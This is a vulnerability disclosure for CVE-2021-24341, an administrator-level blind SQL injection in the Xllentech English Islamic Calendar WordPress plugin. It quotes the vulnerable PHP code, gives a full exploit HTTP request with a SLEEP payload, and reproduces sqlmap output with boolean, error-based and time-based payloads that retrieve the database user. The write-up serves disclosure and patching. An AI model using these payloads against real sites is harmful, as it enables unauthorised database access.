Wp Plugin Xllentech English Islamic Calendar

Plugin Details

Plugin Name: wp-plugin : xllentech-english-islamic-calendar
Effected Version : 2.6.6 (and most probably lower version's if any)
Vulnerability : Injection
Minimum Level of Access Required : Administrator
CVE Number : CVE-2021-24341
Identified by : Syed Sheeraz Ali
WPScan Reference URL

Disclosure Timeline

Technical Details

Vulnerable File: /admin/partials/class-xllentech-english-islamic-calendar-troubleshooting.php

Vulnerable Code block and parameter:

  1. Administrator level SQLi for parameter year_number /admin/partials/class-xllentech-english-islamic-calendar-troubleshooting.php#84
84:	$year_number = $_POST["year_number"];
85:	$month_number = $_POST["month_number"];
86:	$wpdb->query("Delete from ".$month_firstdate_table." where english_month=".$month_number." and english_year=".$year_number);

Fix applied in 2.6.8: Track Changelog

SQL Injection Type: Blind Time based SQL Injection

PoC Screenshot:

  1. SQLmap PoC for year_number parameter

screenshot1

  1. Request without Injection payload

screenshot2

  1. Request with 5 second sleep

screenshot3

  1. Request with 15 second sleep

screenshot4

Exploit

POST /wp-admin/options-general.php?page=xllentech_options_tab4 HTTP/1.1
Host: 172.28.128.50
Content-Length: 220
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://172.28.128.50
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-GPC: 1
Referer: http://172.28.128.50/wp-admin/options-general.php?page=xllentech_options_tab4
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: wordpress_232395f24f6cff47569f2739c21385d6=admin%7C1620299005%7Ci5JXmpPpeJQ1VG5oOoxo4SfbUVeO0BUOtOkrbprgxBE%7Cb8b96ad5dc1fd71f30f94e58a973b97fc46b1fb7ecb053030a983c1382bbf579; wordpress_test_cookie=WP%20Cookie%20check; tk_ai=woo%3AiQVT6EvbuCedvp65Wb1%2BuUEl; wordpress_logged_in_232395f24f6cff47569f2739c21385d6=admin%7C1620299005%7Ci5JXmpPpeJQ1VG5oOoxo4SfbUVeO0BUOtOkrbprgxBE%7Cbbdf7d49cc3121c461d8b37a6825e47e879dbd635c53362901c96c5a104fd46b; wp-settings-time-1=1620131631
Connection: close

month_number=12&year_number=2020 AND (SELECT 1381 FROM (SELECT(SLEEP(5)))nhTn)&delete_firstdate=Y&xc-troubleshooting-delete-date-nonce=fc60c35caf&_wp_http_referer=/wp-admin/options-general.php?page=xllentech_options_tab4
reponse is returned in 5 seconds beacuse its a time baesed injection.

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: year_number (POST)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (original value)
    Payload: month_number=12&year_number=(SELECT (CASE WHEN (7200=7200) THEN 2020 ELSE (SELECT 6513 UNION SELECT 8978) END))&delete_firstdate=Y&xc-troubleshooting-delete-date-nonce=fc60c35caf&_wp_http_referer=/wp-admin/options-general.php?page=xllentech_options_tab4

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: month_number=12&year_number=2020 AND GTID_SUBSET(CONCAT(0x7162626271,(SELECT (ELT(7051=7051,1))),0x71767a6b71),7051)&delete_firstdate=Y&xc-troubleshooting-delete-date-nonce=fc60c35caf&_wp_http_referer=/wp-admin/options-general.php?page=xllentech_options_tab4

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: month_number=12&year_number=2020 AND (SELECT 1381 FROM (SELECT(SLEEP(5)))nhTn)&delete_firstdate=Y&xc-troubleshooting-delete-date-nonce=fc60c35caf&_wp_http_referer=/wp-admin/options-general.php?page=xllentech_options_tab4
---
[02:57:21] [INFO] testing MySQL
you provided a HTTP Cookie header value, while target URL provides its own cookies within HTTP Set-Cookie header which intersect with yours. Do you want to merge them in further requests? [Y/n] Y
[02:57:22] [WARNING] reflective value(s) found and filtering out
[02:57:22] [INFO] confirming MySQL
[02:57:22] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Nginx 1.18.0
back-end DBMS: MySQL >= 8.0.0
[02:57:22] [INFO] fetching current user
[02:57:23] [INFO] retrieved: 'bob@localhost'
current user: 'bob@localhost'